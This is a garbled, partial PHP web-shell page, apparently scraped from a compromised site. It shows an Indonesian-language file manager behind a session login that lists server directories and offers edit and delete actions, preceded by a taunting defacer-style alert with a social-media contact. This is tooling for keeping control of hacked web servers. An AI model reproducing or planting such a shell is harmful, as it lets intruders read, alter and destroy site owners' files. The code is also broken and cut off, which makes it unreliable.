alert('Lammer Kayak U Gak Cocok Jadi Bocah Penikung Bro, My Contact => https://www.facebook.com/share/17CRj8DwiF/');"; } } if (!isset($_SESSION['logged_in'])) { echo '
| Nama | Ukuran | Aksi | [Kembali] | "; } $folders = $regularFiles = []; foreach ($files as $file) { if ($file === "." || $file === "..") continue; $fullpath = $path . "/" . $file; if (is_dir($fullpath)) $folders[] = $file; else $regularFiles[] = $file; } foreach (array_merge($folders, $regularFiles) as $file) { $fullpath = $path . "/" . $file; echo "
|---|---|---|
| " . (is_dir($fullpath) ? "[DIR] $file" : $file) . " | "; echo "" . (is_file($fullpath) ? filesize($fullpath) . " bytes" : "-") . " | "; echo ""; if (is_file($fullpath)) echo "Edit | "; echo "Hapus | "; echo ""; echo " |